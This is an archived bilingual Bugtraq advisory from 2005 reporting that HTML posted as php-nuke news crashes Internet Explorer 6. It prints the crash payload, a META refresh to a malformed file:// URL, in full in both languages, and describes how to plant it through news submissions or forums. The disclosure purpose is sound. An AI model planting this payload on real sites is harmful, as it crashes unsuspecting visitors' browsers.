[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050313224752.28595.qmail@www.securityfocus.com>
Date: 13 Mar 2005 22:47:52 -0000
From: WoRmZ Web <wormz.web@...il.com>
To: bugtraq@...urityfocus.com
Subject: html code include in phpnuke news crash IE 6
www.wormzweb.tk
------------------------------------------------------------------------
------------------------------------------------------------------------
ENGLISH
------------------------------------------------------------------------
------------------------------------------------------------------------
An html code include in the news in php-nuke (6.5 patched tested) make visitors with Internet Explorer 6 to crash.
The code is the following:
******************************************************
<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="5;URL=file:// :\">
</head>
<body>
</body>
</html>
******************************************************
Submit news with this code without the admin verification, or submited by the admin will produce a error in Internet Explorer 6.x
This code can be included in forums or other places which allow html code with the same result.
You can read more about this in spanish:
http://usuarios.lycos.es/wormzweb/modules.php?name=Forums&file=viewtopic&t=15&sid=f30c8bf88b4028790c2b35239862c2c1
And you can test it (IE will crahs about 5 seconds after the web will be completed charged)in this link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=164
------------------------------------------------------------------------
------------------------------------------------------------------------
SPANISH
------------------------------------------------------------------------
------------------------------------------------------------------------
Un código html incluido en las noticias de php-nuke (probado en la 6.5 parcheada) hace a los viitantes con Internet Explorer un error. (Se produce el cierre del navegador)
El código es el siguiente:
******************************************************
<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="5;URL=file:// :\">
</head>
<body>
</body>
</html>
******************************************************
Un usuario podría enviar una noticia incluyendo este codigo y sin la vereficación del administrador, o el propio envio por el administrador provocará que los visitantes de la web que usen Internet Explorer 6.x se les cierre la página y produzca error en el navegador
Este código puede ser incluido en foros y otros lugares que permitan código html con el mismo resultado.
Puedes leer mas sobre este bug en el siguente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=Forums&file=viewtopic&t=15&sid=f30c8bf88b4028790c2b35239862c2c1
Puedes ver el codigo en uso y testear como funciona en el siguente link (Usando IE 6.x se cerrará el navegador pasados unos 5 segundos después de que la página se haya cargado completamente):
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=164
________________________________________________________________________
Para mas info [::wormz::] www.wormzweb.tk
Powered by blists - more mailing lists